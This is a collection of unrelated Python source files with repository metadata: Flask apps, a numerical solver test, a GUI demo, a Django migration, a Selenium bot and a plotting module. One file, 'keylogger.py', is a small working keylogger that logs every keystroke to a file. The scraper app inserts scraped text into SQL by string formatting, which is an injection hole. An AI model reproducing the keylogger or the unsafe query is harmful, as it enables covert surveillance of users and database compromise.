|
[
"MIT"
] | null | null | null |
from flask import Flask
import requests
from bs4 import BeautifulSoup
import os
import sqlite3
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
URL = os.environ['SOURCE_URL']
AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
app = Flask(__name__)
def send_simple_message(title, message):
return requests.post(
os.environ['MAIL_URL'],
auth=("api", os.environ['MAILGUN_API_KEY']),
data={"from": "Embevent App <mailgun@sandboxfb0448ff1cfb4ffba160daeecce04274.mailgun.org>",
"to": os.environ['MAIL_LIST'].split(";"),
"subject": title,
"text": message})
def processUpdates(cards):
connection = sqlite3.connect("database.db")
cursor = connection.execute("Select * from CARDS")
old_cards = len(cursor.fetchall())
if len(cards) > old_cards:
logging.info("New updates. Processing")
card = cards[0]
title = card.find_all('h2', class_='h3')[0].text
date = card.find_all('h3', class_='h5')[0].text
content = card.find_all(["p", "div"])[0]
command2 = "INSERT INTO CARDS (title, date, content) VALUES ('{0}', '{1}', '{2}')".format(title,date,content)
connection.execute(command2)
connection.commit()
connection.close()
logging.info("Update stored in DB")
send_simple_message(title=title, message=card)
logging.info("Mail sent")
return card.text
else:
logging.info("No updates generated")
f = cards[0]
the_date, = f.find_all('h3', class_='h5')
return "No news. Last update: {0}. articles available: {1}".format(the_date.text, old_cards)
@app.route('/')
def news():
if not URL:
return "No URL added"
response = requests.get(URL, headers={'User-Agent': AGENT })
soup = BeautifulSoup(response.content, 'html.parser')
cards = soup.find_all('div', class_='card')
return processUpdates(cards)
| 32.968254
| 131
| 0.632162
| 0
| 0
| 0
| 0
| 277
| 0.133365
| 0
| 0
| 617
| 0.297063
|
3c761056de60be7b447d3aeb8075e25a0bb554cd
| 1,278
|
py
|
Python
|
nodaysoff/__init__.py
|
attila5287/no_days_off
|
2482b90b841032976002a3888aa546bb7070a46c
|
[
"MIT"
] | 1
|
2019-12-28T05:25:01.000Z
|
2019-12-28T05:25:01.000Z
|
nodaysoff/__init__.py
|
attila5287/no_days_off
|
2482b90b841032976002a3888aa546bb7070a46c
|
[
"MIT"
] | 6
|
2019-12-28T01:12:25.000Z
|
2022-03-12T00:10:08.000Z
|
nodaysoff/__init__.py
|
attila5287/no_days_off
|
2482b90b841032976002a3888aa546bb7070a46c
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from nodaysoff.config import Config
# from flask_session import Session
db = SQLAlchemy()
bcrypt = Bcrypt()
login_manager = LoginManager()
login_manager.login_view = 'users.login'
login_manager.login_message_category = 'primary'
mail = Mail()
def create_app(config_class=Config):
pass
app = Flask(__name__, instance_relative_config=False)
app.config.from_object(Config)
# print('secret'+str(app.secret_key))
db.init_app(app)
bcrypt.init_app(app)
login_manager.init_app(app)
mail.init_app(app)
# sess = Session()
# sess.init_app(app)
from nodaysoff.users.routes import users
from nodaysoff.posts.routes import posts
from nodaysoff.tasks.routes import tasks
from nodaysoff.prodays.routes import prodays
from nodaysoff.main.routes import main
from nodaysoff.errors.handlers import errors
app.register_blueprint(users)
app.register_blueprint(posts)
app.register_blueprint(tasks)
app.register_blueprint(prodays)
app.register_blueprint(main)
app.register_blueprint(errors)
return app
| 30.428571
| 59
| 0.739437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 136
| 0.106416
|
3c768b97cd3aef1e83be11569f9ef43e98211953
| 695
|
py
|
Python
|
examples/lobpcg_test.py
|
Forgotten/modelscf
|
2cf0fe5210fadcee7da70d6bf035336c38d150db
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2021-09-22T21:48:02.000Z
|
2021-09-22T21:48:02.000Z
|
examples/lobpcg_test.py
|
Forgotten/modelscf
|
2cf0fe5210fadcee7da70d6bf035336c38d150db
|
[
"BSD-3-Clause-LBNL"
] | 2
|
2018-01-19T18:46:35.000Z
|
2019-04-09T22:59:46.000Z
|
examples/lobpcg_test.py
|
Forgotten/modelscf
|
2cf0fe5210fadcee7da70d6bf035336c38d150db
|
[
"BSD-3-Clause-LBNL"
] | 6
|
2018-01-19T18:34:12.000Z
|
2018-04-06T04:13:03.000Z
|
# scrip to test the lobpcg_sep eigenvalue solver
include("../src/lobpcg_sep.jl")
using LinearAlgebra
Ns = 100
k = 5 # number of eigenvectors
A = sqrt(Ns)*Diagonal(ones(Ns)) + rand(Ns, Ns)
A = 0.5*(A + A')
(e, X) = eigen(A)
# orthonormal starting guess of the eigenvectors
X0 = qr(rand(Ns, k + 6)).Q[:, 1:k+6]
#computing the lowest K eigenvalues
(eL, XL, it) = lobpcg_sep(A,X0, x-> x, k )
# printing the error
println("error on the computation the eigenvalues " * string(norm(eL - e[1:k])))
# now we use a preconditioner (the exact inverse)
Ainv = inv(A)
(eL1, XL1, it1) = lobpcg_sep(A,X0, x-> Ainv*x, k)
println("error on the computation the eigenvalues " * string(norm(eL1 - e[1:k])))
| 24.821429
| 81
| 0.667626
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 332
| 0.477698
|
3c7727ecdb99959039e2a39114163de2e8432514
| 1,549
|
py
|
Python
|
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
"""
Implementation of a ButtonEditor demo plugin for Traits UI demo program.
This demo shows each of the two styles of the ButtonEditor.
(As of this writing, they are identical.)
"""
from traits.api import HasTraits, Button
from traitsui.api import Item, View, Group
from traitsui.message import message
#-------------------------------------------------------------------------
# Demo Class
#-------------------------------------------------------------------------
class ButtonEditorDemo(HasTraits):
""" This class specifies the details of the ButtonEditor demo.
"""
# To demonstrate any given Trait editor, an appropriate Trait is required.
fire_event = Button('Click Me')
def _fire_event_fired():
message("Button clicked!")
# ButtonEditor display
# (Note that Text and ReadOnly versions are not applicable)
event_group = Group(Item('fire_event', style='simple', label='Simple'),
Item('_'),
Item('fire_event', style='custom', label='Custom'),
Item('_'),
Item(label='[text style unavailable]'),
Item('_'),
Item(label='[read only style unavailable]'))
# Demo view
view1 = View(event_group,
title='ButtonEditor',
buttons=['OK'],
width=250)
# Create the demo:
popup = ButtonEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
popup.configure_traits()
| 30.98
| 78
| 0.551323
| 919
| 0.593286
| 0
| 0
| 0
| 0
| 0
| 0
| 825
| 0.532602
|
3c77652672bdfce35cef51c965f7b9c88501f504
| 1,181
|
py
|
Python
|
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import setuptools
version='0.1'
setuptools.setup(
name='TracDevPlatformPlugin',
version=version,
description='Provide helpers to ease development on top of Trac',
author='Felix Schwarz',
author_email='felix.schwarz@oss.schwarz.eu',
url='http://www.schwarz.eu/opensource/projects/trac_dev_platform',
download_url='http://www.schwarz.eu/opensource/projects/trac_dev_platform/download/%s' % version,
license='MIT',
install_requires=['Trac >= 0.11'],
extras_require={'BeautifulSoup': 'BeautifulSoup'},
tests_require=['nose'],
test_suite = 'nose.collector',
zip_safe=False,
packages=setuptools.find_packages(exclude=['tests']),
include_package_data=True,
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Trac',
],
)
| 31.078947
| 101
| 0.653683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 679
| 0.574936
|
3c78adc10fdbecc0bce8f85ff740740007a63985
| 276
|
py
|
Python
|
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
from pynput.keyboard import Key, Listener
import logging
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
| 23
| 102
| 0.735507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.144928
|
3c797bad94039032f3ec8a0956509b976eb165dd
| 1,372
|
py
|
Python
|
app/core/migrations/0007_order.py
|
ifiokeyo/RecipeAPI
|
8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974
|
[
"MIT"
] | null | null | null |
app/core/migrations/0007_order.py
|
ifiokeyo/RecipeAPI
|
8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974
|
[
"MIT"
] | null | null | null |
app/core/migrations/0007_order.py
|
ifiokeyo/RecipeAPI
|
8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-11-02 09:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('core', '0006_auto_20191102_0706'),
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
('size', models.CharField(choices=[('L', 'Large'), ('M', 'Medium'), ('S', 'small')], default='S', max_length=1)),
('quantity', models.PositiveIntegerField(default=1, help_text='number of pizza-box')),
('status', models.CharField(choices=[('P', 'Pending'), ('I', 'In-progress'), ('DE', 'Done'), ('DL', 'Delivered')], default='P', max_length=2)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orders', to=settings.AUTH_USER_MODEL)),
('pizza_flavour', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orders', to='core.Pizza')),
],
),
]
| 45.733333
| 159
| 0.618076
| 1,201
| 0.875364
| 0
| 0
| 0
| 0
| 0
| 0
| 303
| 0.220845
|
3c7b515ae39c770bf0370e05e2c3d7ec44f6e7fd
| 2,687
|
py
|
Python
|
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import datetime
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import functools
# import pathlib
from conflista import Bot
from salvacode import Salvar
from escreve import escreve
from geraqrcode import Gerar
date = datetime.date.today()
jan = Tk()
jan.title("Bot Mercado Envios")
jan.geometry("800x300")
jan.configure(background="#2b2b2b")
jan.resizable(width=False, height=False)
jan.iconbitmap(default="C:\programas\Programaçâo\GitHub\Bot-ML\Bot-ML\images\LogoIcon.ico")
logo = PhotoImage(file="C:\programas\Programaçâo\GitHub\Bot-ML\Bot-ML\images\logo.png")
messagebox.showinfo("Hello World !", "Seja Bem-Vindo ")
LeftFrame = Frame(jan, width=220, height=500, bg="#FF8C00", relief="raise")
LeftFrame.pack(side=LEFT)
RightFrame = Frame(jan, width=575, height=500, bg="#4f4f4f", relief="raise")
RightFrame.pack(side=RIGHT)
Caixas = Label(RightFrame, text="Total De Caixas:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Caixas.place(x=5, y=10)
CaixasEntry = ttk.Entry(RightFrame, width=53)
CaixasEntry.place(x=230, y=25)
Lote = Label(RightFrame, text="Nº Do Lote:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Lote.place(x=5, y=75)
LoteEntry = ttk.Entry(RightFrame, width=53)
LoteEntry.place(x=230, y=90)
Valores = Label(RightFrame, text="Codigos Lidos: ", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Valores.place(x=5, y=140)
ValoresEntry = Text(RightFrame, width=40, height=5)
# ValoresEntry.config(state=state)
ValoresEntry.place(x=230, y=155)
# file = open(f'C:\programas\Programaçâo\GitHub\{date} QR-BarCode-Unity.txt', 'w+')
# file = open(f'{date} QR-BarCode-Unity', 'w+')
def PegaLista():
try:
Caixas = CaixasEntry.get()
Valores = ValoresEntry.get('1.0', END)
QuantCaixas = int(Caixas)
Lista = Valores
# Lista = Lista.replace(',+',',')
Lista = Lista.split(',+')
QuantLista = len(Lista)
if QuantCaixas == QuantLista:
try:
escreve(Bot, Lista, date, Salvar)
Gerar(Lista, LoteEntry, contador=0)
except:
messagebox.showerror("Erro !", "Falha Na Função (escreve)")
else:
messagebox.showerror("Erro !", "Seu Total de Caixas Não Bate Com Seus Codigos !")
except:
messagebox.showerror("Erro !", "Por Favor Coloque Os Valores Nos Campos !")
ConfButton = ttk.Button(RightFrame, text="Adicionar Lista", width= 30, command=PegaLista)
ConfButton.place(x=5, y=190)
jan.mainloop()
| 26.60396
| 106
| 0.671381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 768
| 0.284761
|
3c7b6e7f1356932087387fb61f2acb5391ed0b70
| 943
|
py
|
Python
|
src/data/make_atac.py
|
mguo123/pan_omics
|
e1cacd543635b398fb08c0b31d08fa6b7c389658
|
[
"MIT"
] | null | null | null |
src/data/make_atac.py
|
mguo123/pan_omics
|
e1cacd543635b398fb08c0b31d08fa6b7c389658
|
[
"MIT"
] | null | null | null |
src/data/make_atac.py
|
mguo123/pan_omics
|
e1cacd543635b398fb08c0b31d08fa6b7c389658
|
[
"MIT"
] | null | null | null |
"""
process_atac.py
Margaret Guo
04/15/2020
footprinting (.bed) --> csv
notebooks
- make_hichip_df-withsnps-cancer-only
"""
import pandas as pd
#### FIX FOR HOCO
def footprinting_to_df(footprinting_file):
footprinting_df = pd.read_table(footprinting_file,header=None)
footprinting_df.columns = ['chr', 'start', 'end', 'motif', 'score', 'strand', 'other']
temp = footprinting_df.motif.str.split('(') #i.e. remove (var.2)
temp = temp.apply(lambda x: x[0])
temp = temp.str.split('.')
footprinting_df['motif_abbr'] = temp.apply(lambda x: x[-1])
return footprinting_df
def atac_to_df(atac_narrowPeak_file):
atac_df = pd.read_table(atac_narrowPeak_file,header=None)
atac_df.columns = ['chr', 'start', 'end']
atac_df = atac_df.groupby(atac_df.columns.tolist()).size().reset_index().rename(columns={0:'count'})
atac_df['region'] = atac_df.apply(lambda row: '_'.join(row.values.astype(str)), axis=1)
return atac_df
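# Minimal usage sketch (hypothetical file names -- substitute the actual .bed /
# narrowPeak outputs of the pipeline):
#     fp_df = footprinting_to_df('sample_footprints.bed')
#     atac_df = atac_to_df('sample_peaks.narrowPeak')
#     fp_df.to_csv('sample_footprints.csv', index=False)
#     atac_df.to_csv('sample_peaks.csv', index=False)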
| 29.46875
| 104
| 0.69035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 267
| 0.283139
|
3c7b9bebae1fcd81af0109ae86287f833fb440e9
| 834
|
py
|
Python
|
waimai/libs/login.py
|
xucheng11/test
|
2987d34823825798bffac3cfb30cadab42dae998
|
[
"MulanPSL-1.0"
] | null | null | null |
waimai/libs/login.py
|
xucheng11/test
|
2987d34823825798bffac3cfb30cadab42dae998
|
[
"MulanPSL-1.0"
] | null | null | null |
waimai/libs/login.py
|
xucheng11/test
|
2987d34823825798bffac3cfb30cadab42dae998
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
-------------------------------------------------
# @Project :Food-delivery (waimai) system
# @File :login
# @Date :2021/8/1 18:16
# @Author :小成
# @Email :1224069978
# @Software :PyCharm
-------------------------------------------------
"""
import hashlib, copy, requests
from conf.host import *
def get_md5(password):
md5 = hashlib.md5()
md5.update(password.encode("utf-8"))
return md5.hexdigest()
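# For example, get_md5("123456") returns "e10adc3949ba59abbe56e057f20f883e",
# which is what Login.login below sends in place of the plain-text password.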
class Login:
def login(self,indata,getToken=False):
url = f"{Host}/account/sLogin"
        payload = copy.copy(indata)
        payload["password"] = get_md5(indata["password"])
        res = requests.post(url, data=payload)
print(res)
if getToken==False:
return res.json()
else:
return res.json()["data"]["token"]
if __name__ == '__main__':
print(Login().login(user))
| 25.272727
| 55
| 0.52518
| 370
| 0.437352
| 0
| 0
| 0
| 0
| 0
| 0
| 319
| 0.377069
|
3c7be908e5d846fc839b0269f1d2587bd74e3afb
| 409
|
py
|
Python
|
identities.py
|
Nandan-18/Algebraic-Identites
|
7ba979fbddbf1d487e728ed41aafd1eed5e3e100
|
[
"MIT"
] | null | null | null |
identities.py
|
Nandan-18/Algebraic-Identites
|
7ba979fbddbf1d487e728ed41aafd1eed5e3e100
|
[
"MIT"
] | null | null | null |
identities.py
|
Nandan-18/Algebraic-Identites
|
7ba979fbddbf1d487e728ed41aafd1eed5e3e100
|
[
"MIT"
] | null | null | null |
# Supporting Module
# identities.py
def exp1(a, b):
return a ** 2 + 2 * a * b + b ** 2
def exp2(a, b):
return a ** 2 - 2 * a * b + b ** 2
def exp3(a, b):
return (a + b) * (a - b)
def exp4(a, b):
return (a + b) ** 2 - 2 * a * b
def exp5(a, b):
return a ** 3 + 3 * a ** 2 * b + 3 * a * b ** 2 + b ** 3
def exp6(a, b):
return a ** 3 - 3 * a ** 2 * b + 3 * a * b ** 2 - b ** 3
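# The helpers above correspond to the standard identities:
#   exp1: (a + b)^2, exp2: (a - b)^2, exp3: a^2 - b^2 as (a + b)(a - b),
#   exp4: a^2 + b^2 via (a + b)^2 - 2ab, exp5: (a + b)^3, exp6: (a - b)^3.
# Quick sanity check: exp1(2, 3) == 25 == (2 + 3) ** 2 and exp6(2, 3) == -1 == (2 - 3) ** 3.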
| 15.148148
| 60
| 0.405868
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.08313
|
3c7e63e11d96ab3935b8bb543acdf655bcf3abc1
| 14,296
|
py
|
Python
|
betsy.py
|
animeshsagar/Betsy
|
5cc4ca126fe56803696967b59a9ace61ae7e3f7b
|
[
"MIT"
] | null | null | null |
betsy.py
|
animeshsagar/Betsy
|
5cc4ca126fe56803696967b59a9ace61ae7e3f7b
|
[
"MIT"
] | null | null | null |
betsy.py
|
animeshsagar/Betsy
|
5cc4ca126fe56803696967b59a9ace61ae7e3f7b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# Design Decisions
# Heuristic : Heuristic tries to maximize the pieces of that particular player on top n rows
# Min-Max : Min-Max algorithm has been used
# IDS : Iterative deepening search has been used to move down the tree(depth:100)
# No Time Constraint : No time constraint has been imposed. Instead, the program prints its move iteratively as it searches deeper down the tree
# Dynamic Tree : Tree has been built dynamically to avoid recomputations
from itertools import combinations
import copy
from random import randrange, sample
import sys
import string
import Queue as queue
import sys
import time
n = int(sys.argv[1])
initial = sys.argv[3]
minutes = int(sys.argv[4])
move_person = sys.argv[2]
temp_n = n
# print initial
# n = 3
start = [[0 for x in range(n)] for y in range(n+3)]
count = 0
for i in range(n+3-1,-1,-1):
for j in range(0,n):
start[i][j] = initial[count]
count = count + 1
#print start
#start[5][0] = 'x'
#print start
#test = [['x', 'o', 'x'], ['x', 'x', 'x'], ['o', 'o', 'o'], ['x', 'x', '.'], ['.', '.', '.'], ['.', '.', '.']]
# move_person = 'o'
#Successor Function
def succesor(state):
result = []
if move_person == 'x':
mv = 'x'
else:
mv = 'o'
for i in range(0,n):
flag = 0
for j in range(0,n+3):
if(state[j][i] == '.'):
flag = 1
if flag == 1:
succ = copy.deepcopy(state)
succ[j][i] = mv
result.append((i+1,succ))
# print 'Inside'
break
# print result
for i in range(0,n):
succ = copy.deepcopy(state)
for m in range(n+3-1,-1,-1):
if(succ[m][i] != '.'):
top = m
top_elem = succ[m][i]
# print top,top_elem,m,i
break
elif(succ[0][i] == '.'):
top = 0
top_elem = succ[0][i]
break
temp = succ[0][i]
for j in range(0,n+3-1):
succ[j][i] = state[j+1][i]
succ[top][i] = temp
result.append((-(i+1),succ))
# for elem in result:
# print '\n'
# for elem1 in elem[1]:
# print elem1
# print '\n'
return result
# Check Goal State
def is_goal(state):
succ = copy.deepcopy(state)
for i in range(n,n+3):
if all(succ[i][j] == 'x' for j in range(0,n)) is True:
return True
if all(succ[i][j] == 'o' for j in range(0,n)) is True:
return True
for j in range(0,n):
if all(succ[i][j] == 'x' for i in range(n,n+3)) is True:
return True
if all(succ[i][j] == 'o' for i in range(n,n+3)) is True:
return True
if all(succ[i][i-n] == 'x' for i in range(n,n+3)) is True:
return True
if all(succ[i][i-n] == 'o' for i in range(n,n+3)) is True:
return True
if all(succ[n+3-1-i][i] == 'x' for i in range(n-1,-1,-1)) is True:
return True
if all(succ[n+3-1-i][i] == 'o' for i in range(0,n)) is True:
return True
return False
def heuristic(state):
xcount = 0
ycount = 0
for i in range(3,n+3):
for j in range(0,n):
if(state[i][j] == 'x'):
xcount = xcount + 1
if(state[i][j] == 'o'):
ycount = ycount + 1
return xcount - ycount
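# Illustration of the heuristic above: for a 3-column board (n = 3) it counts
# pieces in rows 3..5 of the internal (n+3)-row grid, so a state with two 'x'
# and one 'o' in those rows scores 2 - 1 = +1; positive values favour 'x' and
# negative values favour 'o'.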
class Node(object):
def __init__(self, data):
self.data = data
self.children = []
self.father_i = -1
self.father_k = -1
self.current_max = -1000
self.current_min = 1000
self.move = 0
def add_child(self, obj):
self.children.append(obj)
#p = Node(test)
#for succ in succesor(test):
# p.add_child(succ[1])
#for c in p.children:
# print c
# Building Trees Dynamically
def solve(state):
# level = [[0 for x in range(0,10)] for y in range(0,10)]
# print state
# level[0][0] = Node(state)
# print level[0][0].data
# print level[0]
global move_person
global temp_n
temp_person = move_person
for i in range(2,100,2):
level = [[0 for x in range(0,10)] for y in range(0,10)]
level[0][0] = Node(state)
for j in range(0,i,1):
if j%2 == 0:
move_person = 'x'
else:
move_person = 'o'
# print level[j]
count = 0
for elem in level[j]:
count = count + 1
if elem != 0:
# print elem.data
for succ in succesor(elem.data):
# print succ
p = Node(succ[1])
p.father_i = j
p.father_k = count-1
p.move = succ[0]
elem.add_child(p)
level[j+1].append(p)
if temp_person == 'x':
for elem in level[i]:
if elem!= 0:
elem.current_max = heuristic(elem.data)
else:
for elem in level[i]:
if elem!= 0:
elem.current_min = heuristic(elem.data)
if temp_person == 'x':
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
else:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
if temp_person == 'x':
find = level[0][0].current_max
for elem in level[1]:
if elem!=0 and elem.current_min == find:
# print elem.data
# print 'Move:'
# print elem.move
# print elem.move,
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
else:
find = level[0][0].current_min
for elem in level[1]:
if elem!=0 and elem.current_max == find:
# print elem.data
# print 'Move:'
# print elem.move,
# print ' ',
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
# for elem in level[4]:
# if elem!=0:
# print elem.data,elem.current
solve(start)
| 54.773946
| 204
| 0.25007
| 307
| 0.021475
| 0
| 0
| 0
| 0
| 0
| 0
| 8,397
| 0.587367
|
3c80ebcea041e63107d9067c90a11c330c458c26
| 503
|
py
|
Python
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | 1
|
2018-07-19T10:34:46.000Z
|
2018-07-19T10:34:46.000Z
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
def binary(n):
if n not in binary.memoize:
binary.memoize[n] = binary(n//2) + str(n % 2)
return binary.memoize[n]
binary.memoize = {0: '0', 1: '1'}
def get_binary_l(n, l):
bin_str = binary(n)
return (l - len(bin_str))*'0' + bin_str
n_f = 9
with open('command_lines.txt', 'w') as out:
for i in range(2**n_f):
out.write('/home/nversbra/anaconda3/envs/py36/bin/python random_forest.py dida_posey_to_predict.csv 100 50 1-1-1 %s\n' % get_binary_l(i, n_f))
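# Example of the padding helper (values follow from the definitions above):
#     binary(5)          -> '101'
#     get_binary_l(5, 9) -> '000000101'
# so with n_f = 9 the loop above emits 2 ** 9 = 512 command lines, one per
# 9-character binary mask.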
| 33.533333
| 151
| 0.61829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.276342
|
3c81582355ba3220bcb59a6354b57fa7be7a46e7
| 17,422
|
py
|
Python
|
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
"""
Functions for plotting the signal to noise per angular bin.
"""
import math
import os.path
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import angular_binning.like_cf_gauss as like_cf
DEG_TO_RAD = math.pi / 180.0
def plot_cl_cf(diag_she_cl_path, she_nl_path, lmin, lmax, theta_min, theta_max, n_theta_bin, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_dir=None):
"""
Produce plots of signal-to-noise per element for both the unbinned power spectrum and the binned correlation
function, using data produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
she_nl_path (str): Path to shear noise power spectrum as a text file.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_theta_bin (int): Number of theta bins.
survey_area_sqdeg (float): Survey area in square degrees, used to calculate the noise variance for the
correlation function.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin, used to calculate
the noise variance for the correlation function.
sigma_e (float): Intrinsic ellipticity dispersion per component, used to calculate the noise variance for the
correlation function.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_dir (str, optional): Directory to save the two plots into, if supplied. If not supplied, plots are
displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Add noise
n_ell = lmax - lmin + 1
nl = np.loadtxt(she_nl_path, max_rows=n_ell)
cls_ = cls_nonoise + nl
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
assert cls_.shape == (n_samp, n_ell)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
fid_cl = cls_[fid_idx, :]
ell = np.arange(lmin, lmax + 1)
fid_cl_err = np.sqrt(2 * fid_cl ** 2 / (2 * ell + 1))
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
